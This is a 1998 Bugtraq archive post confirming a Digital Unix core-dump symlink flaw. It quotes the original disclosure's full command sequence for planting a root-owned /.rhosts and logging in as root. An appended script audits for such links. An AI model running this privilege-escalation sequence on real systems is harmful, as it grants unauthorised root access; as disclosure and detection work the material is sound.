Bugtraq mailing list archives

Re: Symlink problem (Tested only on a Digital Unix 4.0)


From: jonz () NETRAIL NET (Jonathan A. Zdziarski)
Date: Mon, 6 Apr 1998 15:21:20 -0400


BSDi 3.1 -> Didn't Work
Solaris 2.6 (Intel) -> Didn't work

Just to confirm:
DEC Unix 4.0d:
21158 Memory fault - core dumped
$ ls -la core
21159 Memory fault - core dumped
lrwxrwxrwx   1 jonz     staff          8 Apr  6 15:18 core -> /.rhosts
$ ls -la /.rhosts
-rw-------   1 root     system    458752 Apr  6 15:18 /.rhosts
$

Thank you,

Jonathan A. Zdziarski
Systems Administrator
Netrail Incorporated
888-NETRAIL
jonz () netrail net

On Sun, 6 Apr 1997, root wrote:

:Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
:(28/03/1998)
:
:Starting 2 suid root programs in the background and killing them with the -11 flag,
:we'll have a root-owned core with our gid and mode 600. Then a symlink is enough
:to create a file anywhere...like /.rhosts.
:
:rusty () mad it soren () atlink it
:
:$ ls -l /.rhosts
:/.rhosts not found
:$ ls -l /usr/sbin/ping
:-rwsr-xr-x   1 root     bin        32768 Nov 16  1996 /usr/sbin/ping
:$ ln -s /.rhosts core
:$ IMP='
:>+ +
:>'
:$ ping somehost &
:[1] 1337
:$ ping somehost &
:[2] 31337
:$ kill -11 31337
:$ kill -11 1337
:[1]    Segmentation fault   /usr/sbin/ping somehost (core dumped)
:[2]    +Segmentation fault   /usr/sbin/ping somehost (core dumped)
:$ ls -l /.rhosts
:-rw-------   1 root     system    385024 Mar 29 05:17 /.rhosts
: ##/.rhosts has been created....that's all.##
:$ rlogin localhost -l root
:
:It is a very serious problem, it needs a fix as soon as possible;
:in fact we can have a DoS if we link our core to the kernel.
:
:
:Other platforms:
:
:SunOs         4.1.x 5.5.x    Doesn't work
:Linux         2.0.x          Doesn't work
:Digital Unix  4.0d           Doesn't work
:Others                       (not tested yet)
:
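An added audit script, not part of this thread, that a defender can run over user-writable trees (home directories, /tmp) to find symlinks named `core` like the one the quoted post relies on, plus the root-owned mode-600 dumps that a killed setuid program leaves behind. It assumes POSIX `find` and `readlink` and a `root` user; the sandbox tree at the bottom is constructed for the demonstration.

```shell
#!/bin/sh
# Audit helper for the setuid core-dump symlink condition described above.
# find_core_symlinks DIR: report every symlink named "core" under DIR and
# mark the ones whose target escapes the tree (absolute path or ".." step).
# A setuid program dumping core through such a link writes root-owned data
# at the target, so these links should be removed and their owner asked why.
find_core_symlinks() {
    dir=$1
    find "$dir" -type l -name core 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        case "$target" in
            /*|..|../*|*/..|*/../*)
                printf 'ESCAPES %s -> %s\n' "$link" "$target" ;;
            *)
                printf 'local   %s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# find_root_core_dumps DIR: the other symptom, a file named "core" owned by
# root with mode 600 sitting in a tree that root never writes to by hand.
# Only meaningful when run as root, since mode 600 hides it from others.
find_root_core_dumps() {
    find "$1" -type f -name core -user root -perm 600 2>/dev/null
}

# Constructed demonstration: one escaping link (the post's target) and one
# harmless local link, then the report. Nothing here needs privileges.
demo_dir=$(mktemp -d)
ln -s /.rhosts "$demo_dir/core"           # dangling link, flagged as ESCAPES
mkdir "$demo_dir/work"
ln -s ./core.old "$demo_dir/work/core"    # stays inside the tree, reported as local
find_core_symlinks "$demo_dir"
rm -rf "$demo_dir"
```

Run it from cron over /home and /tmp and alert on any ESCAPES line; the local lines are noise unless the target turns out to be a hard link or mount into somewhere sensitive.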
